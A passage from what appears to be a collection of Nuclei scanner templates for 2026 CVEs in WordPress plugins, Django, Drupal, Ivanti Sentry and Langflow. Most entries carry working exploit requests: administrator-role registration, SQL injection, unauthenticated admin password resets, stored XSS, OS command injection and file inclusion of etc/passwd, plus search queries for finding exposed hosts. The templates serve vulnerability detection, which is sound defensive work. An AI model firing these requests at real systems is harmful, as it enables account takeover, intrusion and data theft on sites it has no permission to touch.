Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.\n  impact: |\n    Unauthenticated attackers can redirect users to malicious sites, facilitating phishing or malware distribution.\n  remediation: |\n    Update to the latest version beyond 1.12.1.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify/url-shortify-1121-unauthenticated-open-redirect-via-redirect-to-parameter\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1277\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N\n    cvss-score: 4.7\n    cve-id: CVE-2026-1277\n    epss-score: 0.00592\n    epss-percentile: 0.47009\n    cwe-id: CWE-601\n  metadata:\n    verified: true\n    max-request: 2\n    publicwww-query: \"/plugins/url-shortify/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,redirect,url-shortify,unauth,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=bfcm_2025_offer&redirect_to=https://interact.sh\"\n      - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=welcome_offer&redirect_to=https://interact.sh\"\n\n    stop-at-first-match: true\n\n    matchers:\n      - type: regex\n        part: header\n        regex:\n          - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n# digest: 4a0a004730450220512e1490c69a678945ce568532e08eb5194fc17f553fd2a88e87f7d8f258b10c0221009b0a64c85d302e2321048c9d1a10182ae83a8da5b1ebd4a9a18fa24659beda75:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-1277.yaml","vuln_id":"cve-2026-1277"},{"raw":"id: CVE-2026-12394\n\ninfo:\n  name: WordPress MemberGlut < 1.1.5 - Unauthenticated Privilege Escalation\n  author: str4k3r\n  severity: critical\n  description: |\n    MemberGlut WordPress plugin < 1.1.5 contains a broken access control vulnerability caused by lack of validation of roles during front-end registration, letting unauthenticated users register with arbitrary roles including administrator, exploit requires no authentication.\n  impact: |\n    Unauthenticated users can register as administrators, leading to full site compromise.\n  remediation: |\n    Update to version 1.1.5 or later.\n  reference:\n    - https://wpscan.com/vulnerability/6b126a3e-30d5-4bed-ba47-33e589ec2852/\n    - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.0/includes/class-memberglut-forms.php\n    - https://plugins.trac.wordpress.org/browser/memberglut/tags/1.1.5/includes/class-memberglut-forms.php\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-12394\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-12394\n    epss-score: 0.01492\n    epss-percentile: 0.72997\n    cwe-id: CWE-269\n  metadata:\n    max-request: 3\n    verified: true\n    vendor: memberglut\n    product: memberglut\n    fofa-query: body=\"wp-content/plugins/memberglut\"\n  tags: cve,cve2026,wordpress,wp-plugin,memberglut,privesc,unauth,wp\n\nvariables:\n  rand_user: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /register/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains_all(body, \"register_nonce\", \"memberglut_register\")\n          - status_code == 200\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: register_nonce\n        part: body\n        group: 1\n        regex:\n          - 'name=\"register_nonce\"\\s*value=\"([a-f0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /register/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=memberglut_register&register_nonce={{register_nonce}}&username={{rand_user}}&email={{rand_user}}@example.test&password=Cve12394Test1!&first_name=a&last_name=a&default_role=administrator\n\n      - |\n        GET /wp-admin/users.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code_1 == 302\n          - contains(header_1, \"registration_success\")\n          - status_code_2 == 200\n          - contains_all(body_2, \"wpbody-content\", \"Administrator\")\n        condition: and\n# digest: 4a0a00473045022003d6cc7077e688bba1936def190375c87015ebfbd5e6bbe58f4b069a56fd704e02210087af487be1937225cedf249692078fa1752e428a5e3479bf32dbe7e506f92b94:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-12394.yaml","vuln_id":"cve-2026-12394"},{"raw":"id: CVE-2026-1207\n\ninfo:\n  name: Django RasterField - SQL Injection\n  author: omarkurt\n  severity: high\n  description: |\n    Django < 6.0.2, < 5.2.11, and < 4.2.28 contains a SQL injection caused by improper sanitization of the band index parameter in RasterField on PostGIS, letting remote attackers inject SQL, exploit requires crafted input.\n  impact: |\n    Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.\n  remediation: |\n    Upgrade to versions 6.0.2, 5.2.11, 4.2.28 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1207\n    - https://www.djangoproject.com/weblog/2026/feb/03/security-releases/\n    - https://github.com/django/django/commit/81aa5292967cd09319c45fe2c1a525ce7b6684d8\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n    cvss-score: 8.1\n    cve-id: CVE-2026-1207\n    epss-score: 0.13251\n    epss-percentile: 0.96204\n    cwe-id: CWE-89\n    cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: djangoproject\n    product: django\n    shodan-query: 'django'\n    fofa-query: 'app=\"Django\"'\n  tags: cve,cve2026,django,sqli,postgis,rasterfield,vuln,unauth,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--\"\n      - \"{{BaseURL}}/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--\"\n\n    stop-at-first-match: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 500'\n          - 'contains_all(body, \"invalid input syntax for type integer\", \"PostgreSQL\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: postgres_version\n        part: body\n        group: 1\n        regex:\n          - 'PostgreSQL ([0-9]+\\.[0-9]+)'\n# digest: 490a00463044022032fe22e36bed3c804975be4d305fcca44b68c25d86743756e01ec10718471ce8022078c4e147782a16f23f7e770666a137be94377082ac4364298cdf8659dc5d157b:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-1207.yaml","vuln_id":"cve-2026-1207"},{"raw":"id: CVE-2026-11801\n\ninfo:\n  name: WPAdverts <= 2.3.2 - Information Disclosure\n  author: 0x_Akoko\n  severity: high\n  description: |\n    WPAdverts – Classifieds Plugin for WordPress <= 2.3.2 contains an authorization bypass caused by improper user authorization verification in classifieds-types REST endpoint, letting unauthenticated attackers retrieve internal site configuration data, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can access internal site configuration data, potentially exposing sensitive information about the site setup.\n  remediation: |\n    Update to the latest version beyond 2.3.2.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/37bb8d68-dd87-437a-80e5-e99e93dc55b6\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-11801\n    - https://plugins.trac.wordpress.org/changeset?reponame=&new=3635095%40wpadverts%2Ftrunk&old=3557928%40wpadverts%2Ftrunk\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-11801\n    epss-score: 0.00967\n    epss-percentile: 0.60318\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: developer\n    product: wpadverts\n    framework: wordpress\n    shodan-query: http.html:\"wp-content/plugins/wpadverts\"\n    fofa-query: body=\"wp-content/plugins/wpadverts\"\n  tags: cve,cve2026,wpadverts,wp,wordpress,wp-plugin,exposure\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/wpadverts/v1/classifieds-types HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        GET /?rest_route=/wpadverts/v1/classifieds-types HTTP/1.1\n        Host: {{Hostname}}\n\n    stop-at-first-match: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"json\")'\n          - 'contains_all(body, \"\\\"form_schemes_default\\\"\", \"\\\"meta__adverts_email\\\"\", \"\\\"post_type\\\"\", \"\\\"data\\\"\")'\n        condition: and\n# digest: 490a0046304402206c080134be7cf1bc65b786a0049946a303322aeafdbf28a1cb78686546ab3b80022078720b21c0e223ee0e4981934e7331f909d3a33237e3f8f573637f2d3a9ef091:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-11801.yaml","vuln_id":"cve-2026-11801"},{"raw":"id: CVE-2026-11387\n\ninfo:\n  name: SMS Alert – SMS & OTP for WooCommerce - Privilege Escalation\n  author: str4k3r\n  severity: critical\n  description: |\n    The SMS Alert – SMS & OTP for WooCommerce, Order Notifications & Abandoned Cart Recovery plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.9.5. This is due to the plugin not properly validating a user's identity prior to updating their details like reset the password of any user account, including administrators, and gain full access to those accounts. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account. This is only vulnerable on sites with OTP verification for password resets enabled, and where the administrator (or other user) has set a phone number for OTP verification.\n  impact: |\n    Unauthenticated attackers can reset passwords and take over user accounts, including administrators, leading to full account compromise.\n  remediation: |\n    Update to the latest version of the plugin.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-11387\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c31906da-f2fd-40ac-86e0-3f1ed0409d0c?source=cve\n    - https://plugins.trac.wordpress.org/changeset/3587983/sms-alert\n    - https://wordpress.org/plugins/sms-alert/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-11387\n    epss-score: 0.02208\n    epss-percentile: 0.81818\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: cozyvision1\n    product: sms-alert\n  tags: cve,cve2026,wordpress,wp-plugin,sms-alert,auth-bypass,account-takeover\n\nvariables:\n  username: \"\"\n  new_password: \"CVE11387-{{rand_base(16)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-login.php?action=lostpassword HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        user_login={{url_encode(username)}}&wc_reset_password=1\n\n      - |\n        POST /?option=smsalert-change-password-form HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        option=smsalert-change-password-form&smsalert_user_newpwd={{url_encode(new_password)}}&smsalert_user_cnfpwd={{url_encode(new_password)}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"password-reset=true\"\n\n      - type: status\n        status:\n          - 302\n\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"Username: \" + username + \" | New Password: \" + new_password'\n# digest: 4a0a0047304502206f056eeacfa39dea816a544bfa003039dd347c647e97c3cc8094e1b3d7950c88022100ba5712bfdb9cf0a080a6666a6fe893860123a1780d56cd50813253093b957112:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-11387.yaml","vuln_id":"cve-2026-11387"},{"raw":"id: CVE-2026-1115\n\ninfo:\n  name: parisneo/lollms < 2.2.0 - Authenticated Stored XSS\n  author: str4k3r\n  severity: high\n  description: |\n    parisneo/lollms < 2.2.0 contains a stored XSS caused by unsanitized user input in create_post function in backend/routers/social/__init__.py, letting attackers inject malicious scripts executed in user browsers, exploit requires crafted post submission.\n  impact: |\n    Attackers can execute malicious scripts in user browsers, leading to account takeover, session hijacking, and wormable attacks.\n  remediation: |\n    Update to version 2.2.0 or later.\n  reference:\n    - https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a\n    - https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1115\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\n    cvss-score: 9.0\n    cve-id: CVE-2026-1115\n    epss-score: 0.0121\n    epss-percentile: 0.67113\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: parisneo\n    product: lollms\n    shodan-query: http.title:\"LoLLMs\"\n    fofa-query: title=\"LoLLMs\"\n  tags: cve,cve2026,lollms,ai,xss,stored,authenticated,intrusive\n\nvariables:\n  marker: \"{{rand_base(8)}}\"\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        POST /api/auth/token HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        username={{url_encode(username)}}&password={{url_encode(password)}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"access_token\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: access_token\n        part: body\n        internal: true\n        json:\n          - '.access_token'\n\n  - raw:\n      - |\n        POST /api/social/posts HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{access_token}}\n        Content-Type: application/json\n\n        {\"content\":\"CVE20261115{{marker}} <img src=x onerror=alert(document.domain)>\",\"visibility\":\"public\",\"media\":[]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 201'\n        internal: true\n\n    extractors:\n      - type: json\n        name: post_id\n        part: body\n        internal: true\n        json:\n          - '.id'\n\n  - raw:\n      - |\n        GET /api/social/feed HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{access_token}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"CVE20261115{{marker}}\", \"<img src=x onerror=alert(document.domain)>\")'\n        condition: and\n# digest: 4a0a00473045022100ca0a21d199908a85983e06aab5a162138cba8eb1a0d5793610ef33ac3faed24002201b6d0b58fcf8bfb049583eb8c1865796c9b16ce02196ccaf1fd0db9f938b26a6:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-1115.yaml","vuln_id":"cve-2026-1115"},{"raw":"id: CVE-2026-10823\n\ninfo:\n  name: YMC Filter WordPress - Unauthenticated Post Disclosure\n  author: Hardik-369\n  severity: high\n  description: |\n    YMC Filter WordPress plugin < 3.11.3 contains a broken access control vulnerability caused by improper authorization and lack of validation in a REST API endpoint, letting unauthenticated attackers retrieve private and non-public post content, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can access private, draft, and non-public post content, leading to sensitive information disclosure.\n  remediation: |\n    Update to version 3.11.3 or later.\n  reference:\n    - https://wpscan.com/vulnerability/b55ebf9e-a05d-4ae4-b653-da7db63e76d2/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-10823\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-10823\n    epss-score: 0.01524\n    epss-percentile: 0.73522\n    cwe-id: CWE-200\n  metadata:\n    max-request: 2\n    verified: true\n    vendor: ymc\n    product: ymc-filter\n    publicwww-query: \"/plugins/ymc-smart-filter/\"\n  tags: cve,cve2026,wordpress,wp-plugin,ymc-filter,disclosure,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /wp-json/ymc/v1/posts/filter HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"params\":{\"filter_id\":1,\"post_status\":\"publish\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"\\\"success\\\":true\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-json/ymc/v1/posts/filter HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"params\":{\"filter_id\":1,\"post_status\":\"draft\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"\\\"success\\\":true\", \"post-card\")'\n        condition: and\n# digest: 4a0a004730450220684e2d9a36e43db5d73810d57d17a78c774a83a664cdf13aa278246076e59cce022100be0c82eb0c8e56a790c638b2b9bb50541d4c1808432f4e3f15416be212e88f6a:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-10823.yaml","vuln_id":"cve-2026-10823"},{"raw":"id: CVE-2026-10768\n\ninfo:\n  name: Drupal LocalGov Workflows < 1.6.0 - Information Disclosure\n  author: str4k3r\n  severity: high\n  description: |\n    Drupal LocalGov Workflows < 1.6.0 contains a broken access control vulnerability caused by missing authorization checks, letting attackers perform forceful browsing to access unauthorized resources, exploit requires no special privileges.\n  impact: |\n    Attackers can access unauthorized resources, potentially exposing sensitive data or functionality.\n  remediation: |\n    Update to a version later than 1.6.0 or the latest available version.\n  reference:\n    - https://www.drupal.org/sa-contrib-2026-039\n    - https://www.drupal.org/project/localgov_workflows/releases/1.6.0\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-10768\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-10768\n    epss-score: 0.02126\n    epss-percentile: 0.81119\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: drupal\n    product: localgov_workflows\n    framework: drupal\n    fofa-query: 'body=\"/modules/contrib/localgov\"'\n  tags: cve,cve2026,drupal,localgov,exposure\n\nhttp:\n  - raw:\n      - |\n        GET /admin/content/localgov-service-contact/content-by-owner HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_all(body, 'views-field-title', 'views-field-user', 'views-field-status')\"\n          - \"contains(body, 'view-id-localgov_content_by_owner')\"\n          - \"!contains(body, 'views-empty')\"\n          - \"status_code == 200\"\n        condition: and\n# digest: 4a0a00473045022100c3fad6b9a3aabe3a691b3a7d7602ebb693ee941f24449834a0977a8812553eb602206dc7cd905345a81ec9cf08505c5d62f9830963fa4838a9cef2eb4f48a33d8dcf:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-10768.yaml","vuln_id":"cve-2026-10768"},{"raw":"id: CVE-2026-10580\n\ninfo:\n  name: Hippoo Mobile App for WooCommerce <= 1.9.4 - Authentication Bypass to Admin Account Takeover\n  author: pussycat0x\n  severity: critical\n  description: |\n    Hippoo Mobile App for WooCommerce WordPress plugin <= 1.9.4 contains an authentication bypass caused by logic conflation in user permission checks, letting unauthenticated attackers take over administrator accounts via REST API password reset.\n  impact: |\n    Unauthenticated attackers can reset any WordPress user's password, including administrators, gaining full administrative control of the site.\n  remediation: |\n    Update to a version later than 1.9.4 or the latest available version.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-194-unauthenticated-authentication-bypass-to-administrator-account-takeover-via-rest-api\n    - https://plugins.trac.wordpress.org/changeset/3557733\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-10580\n    epss-score: 0.02948\n    epss-percentile: 0.86564\n    cwe-id: CWE-285\n  metadata:\n    max-request: 2\n    vendor: hippoo\n    product: hippoo-mobile-app-for-woocommerce\n    framework: wordpress\n    verified: true\n    shodan-query: http.component:\"wordpress\"\n    fofa-query: body=\"hippoo\"\n  tags: cve,cve2026,wordpress,wp-plugin,hippoo,woocommerce,intrusive\n\nvariables:\n  new_password: \"{{rand_base(16)}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/hippoo/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'Hippoo')\"\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: plugin_version\n        part: body\n        group: 1\n        regex:\n          - 'Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-json/wc-hippoo/v1/ext/wp/v2/users/1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"password\":\"{{new_password}}\"}\n\n      - |\n        POST /wp-json/wc-hippoo/v1/ext/wp/v2/users/1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"password\":\"{{new_password}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code_1 == 200 || status_code_2 == 200'\n          - 'contains_any(body, \"is_super_admin\",\"capabilities\")'\n          - 'contains(body, \"woocommerce_meta\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: username\n        part: body\n        group: 1\n        regex:\n          - '\"username\":\"([^\"]+)\"'\n\n      - type: dsl\n        name: new_password\n        dsl:\n          - new_password\n# digest: 490a004630440220646f22270cf401e3be5f84043095ad32da3c6caca312b34d06abacc3ae4fa8eb02205e36742209d613390220c971738e18fb2cfd22cf5cc41702ed1a20680958b503:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-10580.yaml","vuln_id":"cve-2026-10580"},{"raw":"id: CVE-2026-10520\n\ninfo:\n  name: Ivanti Sentry - OS Command Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution\n  impact: |\n    Remote unauthenticated attackers can execute code as root, leading to full system compromise.\n  remediation: |\n    Upgrade to versions R10.5.2, R10.6.2, or R10.7.1 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-10520\n    - https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523/blob/main/README.md\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"Ivanti\" html:\"Sentry\"\n  tags: cve,cve2026,ivanti,sentry,rce,vkev,kev\n\nhttp:\n  - raw:\n      - |\n        POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        message=execute%20system%20%2fconfiguration%2fsystem%2fcommandexec%20%3ccommandexec%3e%3cindex%3e1%3c%2findex%3e%3creqandres%3eecho%20CVE-2026-10520%3c%2freqandres%3e%3c%2fcommandexec%3e\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Message handled successfully\"\n          - \"CVE-2026-10520\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100bf4183f42e58ed6847f53e8806ee9de5bf29ddb80abf82357fef07c4b1c97a7202200bfb46e1236eebeb6c7dd24ea693fff634d5cd1c6ceb38d8e390c61ba8512ffa:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-10520.yaml","vuln_id":"cve-2026-10520"},{"raw":"id: CVE-2026-0926\n\ninfo:\n  name: Prodigy Commerce <= 3.3.0 - Local File Inclusion\n  author: Shivam Kamboj\n  severity: critical\n  description: |\n    Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access sensitive data, potentially leading to full server compromise.\n  remediation: |\n    Update to the latest version beyond 3.2.9.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/prodigy-commerce/prodigy-commerce-329-unauthenticated-local-file-inclusion-via-parameterstemplate-name\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0926\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-0926\n    epss-score: 0.09396\n    epss-percentile: 0.95178\n    cwe-id: CWE-98\n  metadata:\n    max-request: 2\n    verified: true\n  tags: cve,cve2026,wordpress,wp,wp-plugin,lfi,prodigy-commerce,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    extractors:\n      - type: regex\n        name: nonce\n        part: body\n        group: 1\n        regex:\n          - 'var settings\\s*=\\s*\\{[^}]*\"nonce\"\\s*:\\s*\"([a-f0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=prodigy-render-my-account-widget&nonce={{nonce}}&parameters[template_name]=etc/passwd&parameters[default_path]=/\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502205839a4d27cf0a123caff2d0cb563866c3b03f08a3e2c5a8f322005676b03f067022100d7e56baab96363450d7774181831a81a98a9cf49019ebb669c817ac213ef980f:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-0926.yaml","vuln_id":"cve-2026-0926"},{"raw":"id: CVE-2026-0829\n\ninfo:\n  name: Frontend File Manager Plugin <= 23.5 - Unauthenticated Arbitrary Email Sending\n  author: 0x_Akoko\n  severity: high\n  description: |\n    Frontend File Manager Plugin WordPress plugin through 23.5 contains an open relay and unauthorized file access vulnerability caused by lack of authentication and security checks, letting unauthenticated attackers send emails and access files, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can send spam emails and access sensitive uploaded files, leading to information disclosure and abuse of email functionality.\n  remediation: |\n    Update to the latest version beyond 23.5.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e739e7d3-756a-4c93-9ca7-f7b9f9657033\n    - https://wpscan.com/vulnerability/57d62cea-cfb8-4421-a209-e64a015ad225/\n    - https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.5/inc/callback-functions.php#L98\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-0829\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-0829\n    epss-score: 0.00682\n    epss-percentile: 0.51051\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 2\n  tags: cve,cve2026,wordpress,wp-plugin,unauth,email,frontend-file-manager,missing-auth\n\nvariables:\n  text: \"{{rand_base(5)}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/nmedia-user-file-uploader/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'compare_versions(version, \"<= 23.5\")'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=wpfm_send_file_in_email&file_id=1&emailaddress={{text}}@{{text}}.com&message={{text}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n          - '\"data\":\"File is shared successfully\"'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402205408f5680a3b34ac9d545c7ab617d05dfefdd6b8ecf27ecee10dfa80093a2da7022004dfe1d8ca99d57d9699d52537e231664836d02e56adf76dc6719cb2bf90d165:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-0829.yaml","vuln_id":"cve-2026-0829"},{"raw":"id: CVE-2026-0770\n\ninfo:\n  name: Langflow < 1.3.0 - Remote Code Execution via validate_code() exec()\n  author: affix\n  severity: critical\n  description: |\n    Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root, exploit requires no authentication.\n  impact: |\n    Remote attackers can execute arbitrary code as root, leading to full system compromise.\n  remediation: |\n    Update to the latest version of Langflow.\n  reference:\n    - https://github.com/affix/CVE-2026-0770-PoC\n    - https://github.com/langflow-ai/langflow\n    - https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai\n  classification:\n    cvss-metrics: 